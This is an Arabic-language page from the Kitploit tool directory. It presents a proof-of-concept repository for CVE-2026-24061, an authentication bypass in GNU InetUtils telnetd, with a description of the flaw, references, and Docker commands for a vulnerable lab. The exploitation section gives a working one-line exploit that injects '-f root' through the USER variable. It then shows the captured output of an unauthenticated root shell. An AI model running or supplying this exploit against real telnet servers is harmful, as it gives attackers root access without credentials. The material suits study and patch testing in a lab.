Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061 — GNU telnetd خدمة من GNU InetUtils تجاوز المصادقة | Kitploit
أدوات/GitHubGitHub/typeconfused/cve-2026-24061
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubtypeconfused/cve-2026-24061

CVE-2026-24061

GNU telnetd خدمة من GNU InetUtils تجاوز المصادقة

عرض المستودع
7منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة تجاوز المصادقة عبر حقن الوسائط في GNU InetUtils telnetd (CVE-2026-24061)

في يناير 2026، تم اكتشاف أن خدمة GNU telnetd من GNU InetUtils معرّضة لثغرة تجاوز المصادقة بواسطة Kyu Neushwaistein (المعروف أيضًا باسم Carlos Cortes Alvarez). تُتتبَّع هذه الثغرة برقم CVE-2026-24061، وتسمح للمهاجم بإنشاء جلسة Telnet دون تقديم بيانات اعتماد صالحة، مما يمنح وصولًا غير مصرح به إلى النظام المستهدف. توجد الثغرة في جميع الإصدارات حتى الإصدار 2.7-2 من خدمة GNU telnetd، ويبدو أنها مستوحاة مباشرة من التسعينيات.

هذه ثغرة حقن وسائط (CWE-88) بدرجة خطورة 9.8 (حرجة) وفقًا لمعيار CVSS v3.1.

المراجع:

  • https://www.openwall.com/lists/oss-security/2026/01/20/2
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24061
  • https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/
  • https://github.com/SafeBreach-Labs/CVE-2026-24061

البيئة المعرّضة للثغرة

البناء والتشغيل:

root@kitploit:~
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061

بعد بدء الخدمة، سيكون telnetd يستمع على المنفذ 23.

الاستغلال

تسمح الثغرة بتجاوز المصادقة عن طريق حقن العلامة -f في متغير البيئة USER. عندما يستقبل telnetd اسم مستخدم يبدأ بـ -f، فإنه يمرره إلى برنامج تسجيل الدخول الذي يفسّر -f كعلامة لتخطي المصادقة.

استخدم الأمر التالي لاستغلال هذه الثغرة والحصول على وصول root:

root@kitploit:~
# عميل Linux (يتطلب خيار -a)
USER="-f root" telnet -a 127.0.0.1 23

# عميل macOS (لا يتطلب خيار -a)
USER="-f root" telnet 127.0.0.1 23

بعد الاستغلال الناجح، ستحصل على وصول إلى قشرة root دون تقديم كلمة مرور.

root@kitploit:~
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)

Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)
تنزيل الأداة